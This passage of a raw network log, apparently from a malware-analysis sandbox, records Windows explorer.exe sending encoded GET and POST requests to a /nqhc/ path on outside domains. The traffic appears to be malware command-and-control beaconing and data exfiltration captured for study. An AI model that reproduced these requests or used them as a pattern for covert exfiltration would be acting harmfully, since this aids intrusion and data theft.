                                                                                                                                                                          Data Ascii: ~vqseLBbtmtjKJNz(XYu~P1fjMZreVx6s1eG9GSOhgfknLi33OWiYFwcZhjrPd4NnAqp81iSWLgro98Cna6GiB8sERg2ieH410ZyMJtc54wRESU5YWMpWASxb8MzLKlFVpeha932bVNrNCdpmen7hSPCyRgV(HFIJAYbPM4zHjA3KepPyguZnQri2sSGXv0vxo6S676nmlEA71g3ipRvlMk6Txwsf1CsHFxeT5d_G_yb7epDh1~
                                                                                                                                                                          Dec 5, 2022 15:20:26.112673044 CET12951OUTData Raw: 53 39 65 74 73 47 62 67 4e 5a 4f 33 38 61 77 48 28 76 37 42 53 61 57 34 4a 74 56 53 4a 4d 71 77 5a 73 66 79 47 41 66 52 35 30 79 63 77 79 63 37 77 57 75 43 5a 4d 4f 47 59 73 74 44 77 78 4b 47 77 73 72 47 7e 46 63 76 77 58 4a 31 50 67 4d 75 61 36
                                                                                                                                                                          Data Ascii: S9etsGbgNZO38awH(v7BSaW4JtVSJMqwZsfyGAfR50ycwyc7wWuCZMOGYstDwxKGwsrG~FcvwXJ1PgMua6ofd-(mWffy0W(5SXIYc69PiEQGmrLravjwbnipSjXSPyHsJ_PoIzjRhAOeN28Zow8Zj5VP1tFTsg~I1NIxASF_zsJedymKJDm4~9ICqI6dVyBPHPq5REo32easvin4gqr-18WpUO6v38APexfXqdpCHzyM6LV8t5R
                                                                                                                                                                          Dec 5, 2022 15:20:26.113080978 CET12962OUTData Raw: 6d 37 41 37 28 51 47 64 56 37 61 48 41 33 66 2d 28 73 48 39 31 61 50 73 47 68 5a 53 4b 35 7e 55 63 64 71 38 77 64 30 33 68 41 77 47 35 4a 7a 48 77 4f 6b 64 6d 6e 65 4b 39 41 65 50 33 34 34 5a 4e 65 67 6c 38 58 39 6a 38 34 48 72 34 4c 73 76 34 4d
                                                                                                                                                                          Data Ascii: m7A7(QGdV7aHA3f-(sH91aPsGhZSK5~Ucdq8wd03hAwG5JzHwOkdmneK9AeP344ZNegl8X9j84Hr4Lsv4MstNnWSBCemEY2zJp0Ss2oeecAOuCKFknyXjfLX7wPCN93SBBJhH8tDVmXL4gFnQnuRFaiklMa8L12FQch74gwNkuHb7pkFyHVqYgxK5wRIo4XgCqU5A-pc3YabDf1_t2LQAWf_lsd8G_lXZf9YJBrOvoZhPU5k9sk
                                                                                                                                                                          Dec 5, 2022 15:20:26.113193035 CET12964OUTData Raw: 79 65 53 6f 73 6e 71 55 79 74 4a 45 54 79 38 2d 34 34 4e 65 57 32 71 35 51 66 28 31 4a 34 78 68 57 61 76 39 7e 59 48 49 48 7a 7a 31 4b 76 7e 6e 41 4c 58 67 79 6b 36 38 64 57 4d 44 31 47 69 39 50 5a 6b 43 7a 6a 78 62 4d 53 47 34 6e 63 28 50 67 4b
                                                                                                                                                                          Data Ascii: yeSosnqUytJETy8-44NeW2q5Qf(1J4xhWav9~YHIHzz1Kv~nALXgyk68dWMD1Gi9PZkCzjxbMSG4nc(PgK95IwWv6Jg5OftSDkJvD-nF(OqlnxDHalfxaIQZjs1Osf3zLZjmRJCadLO0W3y0fM5gJoSBp3~Xhs2KQPvTa0yLJsPG(BoAcc(XmF5USGMTXtcepd15uy0pWYHcGKUhvTuGv4iVxoK4fGveyciTy2Yeis16dbBsdB3
                                                                                                                                                                          Dec 5, 2022 15:20:26.275150061 CET12968OUTData Raw: 69 4c 72 46 42 6f 69 66 33 2d 78 77 6c 2d 6e 4c 54 78 36 35 4c 50 50 31 48 30 57 42 64 56 48 45 4d 37 6f 55 69 53 76 69 41 38 5a 49 43 53 66 37 4f 37 46 41 6f 43 43 44 56 61 79 5a 4a 43 52 72 68 35 6b 6d 38 62 78 47 6b 56 6c 56 52 64 48 6a 33 57
                                                                                                                                                                          Data Ascii: iLrFBoif3-xwl-nLTx65LPP1H0WBdVHEM7oUiSviA8ZICSf7O7FAoCCDVayZJCRrh5km8bxGkVlVRdHj3Wyr(VmNo6HFDX6CGYW2zWgLFrrpyULq~910PwI2wrdB6CrIbGxrSqp0Y9UHTFvN5Xt07gqqd42JsSeFNP0YyIBXhx4PMMnLGXBoCOzG6EL-s87fv0tXX3Jvs7hkQZ(eH8EsSYDQV8mu7Q5Y0DXed-dcP5AhG44o8s7
                                                                                                                                                                          Dec 5, 2022 15:20:26.275278091 CET12972OUTData Raw: 45 34 53 45 58 35 30 4c 73 51 6b 70 6e 64 74 61 48 41 70 47 4b 55 76 54 6a 77 28 35 53 67 58 39 4b 37 6d 77 32 74 6f 43 34 5f 75 5a 57 5a 56 69 44 76 28 76 73 47 48 66 6d 59 41 31 53 6b 54 61 32 77 7e 52 67 44 59 47 4c 41 44 31 37 50 6a 4d 79 75
                                                                                                                                                                          Data Ascii: E4SEX50LsQkpndtaHApGKUvTjw(5SgX9K7mw2toC4_uZWZViDv(vsGHfmYA1SkTa2w~RgDYGLAD17PjMyuGG2QRCI_nYZLk9290JKX7jT-7kMfcxxXwc~RDgKHtWaiN7Ri7Y5WBUTX7mvsxTV4EgTsbKEM0764kNUSf4CjELwyh74oTYyRG2(6oe8_ytaYhVeWLsjI65v2FiBA2uCyWpNKlGnOGDyDPrM44KZMxhO73kWjL9Afe
                                                                                                                                                                          Dec 5, 2022 15:20:26.275347948 CET12978OUTData Raw: 68 65 63 33 69 4b 31 76 36 56 66 4f 5a 63 59 67 36 78 53 56 74 6b 63 39 6d 4d 62 52 42 6e 32 30 4a 77 6d 4f 5a 61 69 36 45 66 75 6c 33 55 4e 61 48 4c 74 30 4f 66 4f 78 7e 48 57 36 6d 50 32 67 54 63 6a 41 34 44 7a 74 5a 69 4e 43 69 6b 34 7a 52 51
                                                                                                                                                                          Data Ascii: hec3iK1v6VfOZcYg6xSVtkc9mMbRBn20JwmOZai6Eful3UNaHLt0OfOx~HW6mP2gTcjA4DztZiNCik4zRQIHpR(MiJhcO7QeE6NlXoMTRle6qB5xSdkKsFKcZ8NNXU5GfJkcHJBhEOh1Nm3djc9N7lfbADs4ts(I~kfQYc~bY8K2caMX3A5hBzfZ5W(FFYydv4U7hC6tInoSjpt0B9vBZuUMThsSFLu9lIm0AzLog4pzkblGiNI
                                                                                                                                                                          Dec 5, 2022 15:20:26.440078974 CET12979INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:20:26 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Content-Length: 462
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00
                                                                                                                                                                          Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          95192.168.11.2049954192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:28.135880947 CET12980OUTGET /nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&jP1=y48xBzJ0mzz HTTP/1.1
                                                                                                                                                                          Host: www.wellnessprodia.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:20:28.306195974 CET12981INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:20:28 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Length: 746
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          96192.168.11.2049955208.91.197.3980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:33.685576916 CET12982OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.pinwheeleffect.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.pinwheeleffect.org
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.pinwheeleffect.org/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 30 38 72 66 44 77 55 54 48 49 36 6f 62 69 47 51 42 4c 64 4e 41 67 34 64 41 4f 73 4e 6b 6a 66 59 47 58 76 39 7e 61 75 66 4b 4e 34 52 73 6f 5a 4c 4b 46 62 5f 31 4f 45 5f 37 62 56 43 61 51 64 47 6b 70 68 58 79 77 57 33 4d 30 74 37 6d 4a 55 2d 79 6d 44 6c 72 4c 5a 70 58 6b 7a 49 38 67 69 5f 4f 6f 41 79 62 66 65 57 31 37 76 37 43 38 51 67 4c 70 32 56 63 6f 6f 6d 65 49 70 31 4a 69 51 70 53 64 42 38 53 48 73 44 74 46 42 66 6d 55 75 61 7a 2d 64 4c 33 43 71 56 43 47 70 62 4d 42 6e 64 5a 34 63 6a 4f 71 66 33 6e 71 41 39 30 6a 43 38 6f 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=08rfDwUTHI6obiGQBLdNAg4dAOsNkjfYGXv9~aufKN4RsoZLKFb_1OE_7bVCaQdGkphXywW3M0t7mJU-ymDlrLZpXkzI8gi_OoAybfeW17v7C8QgLp2VcoomeIp1JiQpSdB8SHsDtFBfmUuaz-dL3CqVCGpbMBndZ4cjOqf3nqA90jC8og).


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          97192.168.11.2049956208.91.197.3980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:35.847645044 CET12983OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.pinwheeleffect.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.pinwheeleffect.org
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.pinwheeleffect.org/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 30 38 72 66 44 77 55 54 48 49 36 6f 61 43 32 51 44 71 64 4e 46 41 34 65 64 2d 73 4e 71 44 66 63 47 58 6a 39 7e 62 71 31 4b 66 73 52 73 4a 46 4c 4c 45 62 5f 67 4f 45 5f 70 37 56 48 45 67 64 42 6b 70 74 70 79 79 43 33 4d 30 52 37 70 62 63 2d 77 57 44 6d 6b 72 5a 6d 41 55 7a 46 75 51 69 31 4f 6f 4e 6a 62 64 69 57 31 71 7a 37 44 5f 34 67 64 6f 32 57 57 6f 6f 6b 59 49 70 32 41 43 51 5a 53 64 63 63 53 47 55 54 73 33 64 66 6d 33 32 61 79 2d 64 49 39 79 71 53 66 32 6f 59 46 53 53 68 5a 75 64 59 65 35 62 63 6e 5a 31 42 67 43 37 4b 33 34 43 45 47 51 52 41 45 43 77 59 67 6e 47 74 59 36 49 33 50 50 51 52 47 32 6c 4d 70 52 35 69 51 73 42 79 35 75 4e 72 42 64 32 35 4a 58 64 70 36 38 79 32 6b 75 63 5a 76 65 70 77 6c 39 50 31 70 6d 28 74 72 69 47 50 6a 73 45 69 39 4e 48 51 31 46 76 71 4a 48 78 77 4d 77 6e 76 32 36 6b 46 43 7a 4b 4f 67 47 62 63 34 34 54 30 6c 41 71 59 33 66 4c 47 53 4a 53 35 4b 4e 4a 4e 6f 36 66 57 47 6c 6a 74 33 6f 6d 6c 56 44 39 54 78 6d 70 31 78 5f 47 51 78 32 54 53 55 4a 45 76 51 5f 77 37 7e 59 73 55 41 58 68 4a 57 68 71 5a 37 47 73 44 77 69 77 77 45 45 6c 38 5a 5a 68 4a 56 75 36 66 53 43 76 37 55 76 51 63 37 73 6a 30 65 79 4b 41 75 36 79 6e 28 79 73 64 30 4f 65 36 4b 54 54 47 33 77 55 51 30 4e 30 6a 52 4c 68 61 4a 38 28 4b 76 67 53 41 6f 69 36 48 73 52 4f 43 6c 69 28 4b 46 36 74 31 53 77 6b 69 61 36 4c 33 68 53 35 68 78 62 45 74 61 61 31 57 4e 74 5a 7a 47 66 42 74 6b 56 63 57 48 41 4a 70 65 54 68 2d 6c 4a 28 58 41 45 56 39 6b 6a 59 72 75 63 35 66 59 59 49 61 57 38 64 51 58 2d 4f 59 79 42 6d 78 55 78 4c 48 74 39 4b 37 79 45 73 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=08rfDwUTHI6oaC2QDqdNFA4ed-sNqDfcGXj9~bq1KfsRsJFLLEb_gOE_p7VHEgdBkptpyyC3M0R7pbc-wWDmkrZmAUzFuQi1OoNjbdiW1qz7D_4gdo2WWookYIp2ACQZSdccSGUTs3dfm32ay-dI9yqSf2oYFSShZudYe5bcnZ1BgC7K34CEGQRAECwYgnGtY6I3PPQRG2lMpR5iQsBy5uNrBd25JXdp68y2kucZvepwl9P1pm(triGPjsEi9NHQ1FvqJHxwMwnv26kFCzKOgGbc44T0lAqY3fLGSJS5KNJNo6fWGljt3omlVD9Txmp1x_GQx2TSUJEvQ_w7~YsUAXhJWhqZ7GsDwiwwEEl8ZZhJVu6fSCv7UvQc7sj0eyKAu6yn(ysd0Oe6KTTG3wUQ0N0jRLhaJ8(KvgSAoi6HsROCli(KF6t1Swkia6L3hS5hxbEtaa1WNtZzGfBtkVcWHAJpeTh-lJ(XAEV9kjYruc5fYYIaW8dQX-OYyBmxUxLHt9K7yEs.


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          98192.168.11.2049957208.91.197.3980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:38.021390915 CET12988OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.pinwheeleffect.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.pinwheeleffect.org
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.pinwheeleffect.org/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 30 38 72 66 44 77 55 54 48 49 36 6f 61 43 32 51 44 71 64 4e 46 41 34 65 64 2d 73 4e 71 44 66 63 47 58 6a 39 7e 62 71 31 4b 66 55 52 73 37 4e 4c 4b 6e 7a 5f 6d 2d 45 5f 71 37 56 47 45 67 64 63 6b 71 64 74 79 79 4f 4e 4d 79 64 37 70 49 6b 2d 77 6b 62 6d 68 72 5a 6e 63 45 7a 48 38 67 69 68 4f 6f 42 52 62 64 33 74 31 37 48 37 43 34 55 67 4c 4c 65 56 55 34 6f 6d 59 49 70 36 45 43 51 37 53 64 4a 43 53 47 59 54 73 30 35 66 6e 44 65 61 7a 70 42 49 30 43 71 52 56 57 6f 70 4d 79 54 5a 5a 75 67 72 65 35 62 4d 6e 59 68 42 67 43 62 4b 30 37 61 48 47 77 52 41 4a 69 77 5a 6b 6e 61 78 59 36 55 5f 50 4f 30 52 47 78 35 4d 6f 78 35 69 55 4e 42 7a 28 4f 4e 74 4d 39 32 75 61 48 5a 68 36 38 32 44 6b 76 55 5a 75 75 56 77 6e 4f 4c 31 75 44 66 74 6d 69 47 4e 75 4d 45 4c 33 74 48 32 31 46 66 32 4a 45 49 46 4d 33 6e 76 31 62 45 46 45 57 7e 50 6e 6d 62 65 33 59 54 62 68 41 6d 63 33 65 37 61 53 4a 53 58 4b 50 6c 4e 72 4b 76 57 48 6e 62 73 31 34 6d 69 59 6a 38 58 6d 32 73 36 78 5f 79 69 78 32 4b 4a 55 4c 6f 76 52 66 77 37 36 5f 59 58 49 6e 68 4f 59 78 71 4c 31 6d 74 56 77 69 30 47 45 47 4a 43 61 71 6c 4a 56 65 4b 66 59 79 76 36 66 76 51 51 31 4d 6a 36 55 53 4b 41 75 36 75 5a 28 7a 51 64 33 5f 57 36 4c 6c 6a 47 7a 6e 6f 51 32 4e 30 36 52 4c 68 48 4a 38 6a 70 76 67 61 69 6f 69 4b 74 73 54 43 43 6d 33 62 4b 41 34 56 32 41 77 6b 6e 51 61 4c 61 38 43 6b 6e 78 61 6f 31 61 62 46 47 4e 65 64 7a 46 62 64 74 75 31 63 56 4d 41 4a 75 4f 44 67 33 68 4a 37 78 41 45 49 49 6b 6a 39 67 75 62 4e 66 56 64 30 46 4e 65 6f 4e 4a 5f 58 35 78 47 79 75 55 67 50 50 32 63 6d 64 68 67 73 34 57 37 6e 51 59 71 65 79 41 32 6d 6b 33 5a 77 4e 6b 79 57 79 6a 72 6e 33 6d 56 70 77 72 43 58 4b 71 49 51 6e 34 79 68 4b 32 68 47 73 6d 61 4e 4a 28 31 53 73 74 54 61 41 54 50 63 31 52 51 52 51 35 76 71 44 4f 45 74 55 37 35 61 37 38 62 49 5a 4e 65 46 49 35 76 56 49 54 32 75 7a 30 70 48 72 6b 5f 57 41 71 4e 4b 72 68 79 78 31 39 4a 47 46 33 6d 28 79 4d 71 74 4b 39 2d 7a 4b 75 4d 69 71 43 30 45 48 39 6d 28 2d 52 36 71 34 36 6b 39 4f 46 52 4a 45 35 73 76 37 50 6c 35 4a 76 38 30 43 41 53 59 6b 77 79 4f 64 33 44 55 65 6e 49 66 35 70 48 59 38 6e 72 7a 32 43 54 59 39 47 71 76 36 59 67 49 6c 61 32 31 46 36 72 73 42 75 69 67 30 75 45 56 53 47 6c 36 70 4c 62 65 47 51 35 68 48 75 68 65 62 5a 32 79 39 28 48 68 37 38 65 73 70 51 51 61 4c 35 51 33 68 79 70 35 70 70 7a 67 51 57 71 65 34 61 7a 35 4e 4d 6f 65 33 54 4d 33 58 7a 68 36 49 48 6d 6b 74 71 6a 74 36 53 6a 78 74 6b 5f 73 4f 68 52 7a 75 76 54 78 59 4d 4e 31 4c 33 78 37 65 42 7a 6e 44 63 72 36 38 33 43 36 79 31 65 41 5f 30 51 37 31 49 76 31 37 30 67 37 32 6d 2d 32 6c 34 75 52 5a 4a 56 28 34 61 37 72 2d 34 41 49 2d 38 55 4a 6b 42 57 63 69 67 79 57 4d 70 31 33 41 4c 6e 52 65 4e 72 66 55 35 6d 6a 35 57 5f 76 5f 65 37 67 39 49 61 77 6e 6a 36 66 5a 7a 53 32 42 47 37 61 42 50 75 53 4e 57 37 78 56 49 54 39 41 57 53 4b 62 49 37 39 38 5a 30 4b 67 68 63 69 6b 47 48 45 73 28 6f 43 52 64 36 33 4d 41 51 6a 70 49 4e 55 76 72 62 6f 79 46 50 54 6a 46 74 6d 71 38 65 55 62 69 61 72 35 73 77 58 59 6a 48 32 37 4a 7a 41 6c 61 4a 38 44 75 56 7a 55 72 61 58 33 61 4d 48 79 65 30 59 7a 65 64 59 62 78 46 54 34 49 6d 52 65 49 45 48 71 6d 73 64 55 6e 78 74 77 78 53 6a 4c 64 34 55 56 4b 4f 6f 6a 64 58 74 56 59 55 7a 4d 28 77 36 6e 63 70 76 74 76 77 35 57 75 65 44 4d 7a 43 4c 6f 4c 35 39 37 33 6d 68 6b 6c 67 73 4a 4b 35 56 47 6c 51 44 78 4e 38 34 38 49 7a 7a 6a 67 31 34 63 5a 54 53 71 79 68 4d 4b 41 45 72 78 79 37 75 7a 59 69 34 6f 53 56 33 4f 64 63 6d 6d 53 5f 48 79 62 47 32 34 51 4d 63 48 55 63 4b 68 32 35 6e 55 54 44 73 38 65 58 4c 6b 70 4d 6e 61 44 64 6c 4b 32 74 67 36 6f 73 6e 78 37 4e 57 45 35 35 44 4e 6b 37 45 37 53 5a 57 53 55 41 50 4e 37 6e 43 55 79 7a 79 58 28 62 51 6a 4b 6e 68 65 50 36 30 73 6e 62 66 32 31 39 47 33 6d 4f 67 70 50 30 50 49 46 61 57 46 4a 57 38 79 33 44 38 74 48 4e 77 69 28 50 34 74 4d 38 51 31 62 54 42 79 4b 51 38 39 34 4d 44 4f 54 39 6a 2d 74 6d 52 73 70 31 7a 64 37 78 35 6c 32 30 4d 4c 56 2d 38 65 55 44 66 44 58 48 33 4f 39 6c 73 4c 30 33 4c 37 66 45 52 42 69 45 6b 6c 39 7a 52 50 52 50 67 49 49 68 57 7a 51 4a 54 51 4f 79 37 73 74
